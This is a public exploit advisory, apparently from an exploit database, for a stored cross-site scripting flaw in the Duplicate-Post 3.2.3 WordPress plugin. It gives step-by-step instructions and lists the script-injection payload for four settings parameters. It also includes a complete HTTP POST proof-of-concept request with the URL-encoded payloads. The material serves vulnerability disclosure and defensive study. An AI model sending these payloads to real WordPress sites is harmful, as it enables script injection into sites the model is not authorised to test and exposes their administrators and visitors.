Duplicate-Post 3.2.3 Cross Site Scripting

2019.09.27
Credit: Unk9vvN
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2019-06-11 # Exploit Author: Unk9vvN # Vendor Homepage: https://duplicate-post.lopo.it/ # Software Link: https://wordpress.org/plugins/duplicate-post/ # Version: 3.2.3 # Tested on: Kali Linux # CVE: N/A # Description # This vulnerability is in the validation mode and is located in the plugin management panel and the vulnerability type is stored . the vulnerability parameters are as follows. 1.Go to the 'Settings' section 2.Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections 3.Click the "Save Changes" option 4.Your payload will run # URI: http://localhost/wp-admin/options-general.php?page=duplicatepost # Parameter & Payoad: duplicate_post_title_prefix="><script>alert(1)</script> duplicate_post_title_suffix="><script>alert(1)</script> duplicate_post_increase_menu_order_by="><script>alert(1)</script> duplicate_post_blacklist="><script>alert(1)</script> # # PoC # POST /wp-admin/options.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost Content-Type: application/x-www-form-urlencoded Content-Length: 981 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1 # Discovered by: https://t.me/Unk9vvN


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top